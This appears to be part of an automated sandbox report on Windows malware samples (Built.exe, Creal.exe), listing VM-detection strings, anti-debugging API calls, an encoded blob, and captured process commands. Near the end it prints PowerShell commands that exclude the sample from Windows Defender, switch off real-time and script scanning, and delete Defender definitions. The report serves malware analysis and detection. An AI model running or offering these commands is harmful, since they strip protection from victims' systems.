              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmtoolsd
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \Ufecodevmsrvc
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fecodevmware
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f8vmusrvc
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: pfvboxservice
              Source: Built.exe, 00000004.00000002.2162306766.000002D966844000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWment%SystemRoot%\system32\mswsock.dll
              Source: Creal.exe, 00000005.00000003.2371911211.00000203E848F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2364055620.00000203E8476000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d2qemu-ga
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvboxtray
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmsrvc
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer`
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwareuser
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: Built.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware)
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretrayg
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxservice
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwareuser
              Source: Creal.exe, 00000005.00000003.2162828040.00000203E73E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ro.kernel.qemur
              Source: Creal.exe, 00000005.00000003.2402826222.00000203E7552000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2418046501.00000203E7552000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2369898360.00000203E7538000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2380069030.00000203E7545000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2382040369.00000203E7551000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374232940.00000203E7545000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2371014632.00000203E7543000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmusrvc
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063AAC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6063AAC68
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93657A20 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,4_2_00007FFD93657A20
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063B41B0 GetProcessHeap,0_2_00007FF6063B41B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063AAC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6063AAC68
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063A5CE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6063A5CE0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063A6940 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6063A6940
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063A6B24 SetUnhandledExceptionFilter,0_2_00007FF6063A6B24
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D924D30C SetUnhandledExceptionFilter,2_2_00007FF6D924D30C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D925A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6D925A614
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D924C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF6D924C8A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D924D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6D924D12C
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E28C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF65E28C8A0
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E28D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF65E28D12C
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E29A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF65E29A614
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E28D30C SetUnhandledExceptionFilter,3_2_00007FF65E28D30C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E28C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF65E28C8A0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E28D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF65E28D12C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E29A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF65E29A614
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E28D30C SetUnhandledExceptionFilter,4_2_00007FF65E28D30C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92433028 IsProcessorFeaturePresent,00007FFDA54E1730,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFDA54E1730,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFD92433028
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9359212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFD9359212B
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93591CB7 SetUnhandledExceptionFilter,4_2_00007FFD93591CB7
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9360DFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFD9360DFFC
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33ED070 SetUnhandledExceptionFilter,4_2_00007FFDA33ED070
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33E314C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFDA33E314C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D924D30C SetUnhandledExceptionFilter,5_2_00007FF6D924D30C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D925A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6D925A614
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D924C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF6D924C8A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D924D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6D924D12C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A21960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A21960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A21390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A21390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A31390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A31390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A31960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A31960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A41390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A41390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A41960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A41960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A51390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A51390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A51960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A51960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A61390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A61390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A61960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A61960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A71390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A71390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A71960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A71960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A81390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A81390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A81960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A81960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A91390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89A91390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A91960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89A91960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AA1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AA1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AA1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AA1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AB1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AB1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AB1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AB1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AC1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AC1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AC1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AC1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AD1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AD1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AD1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AD1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AE1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AE1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AE1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AE1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AF1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89AF1390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AF1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89AF1960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B01390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89B01390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B01960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89B01960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B11960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89B11960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B11390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89B11390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B21960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89B21960
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89B21390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89B21390
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89D83248 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD89D83248
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89D82C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD89D82C90
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A1A2920 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD8A1A2920
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A1FC080 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD8A1FC080
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A1FBAC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD8A1FBAC0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2212B IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD8AF2212B
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A26339C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD9A26339C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A262970 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD9A262970
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DA2FE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD9DA2FE30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DA303E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD9DA303E8
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DB63220 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD9DB63220

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'Jump to behavior
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
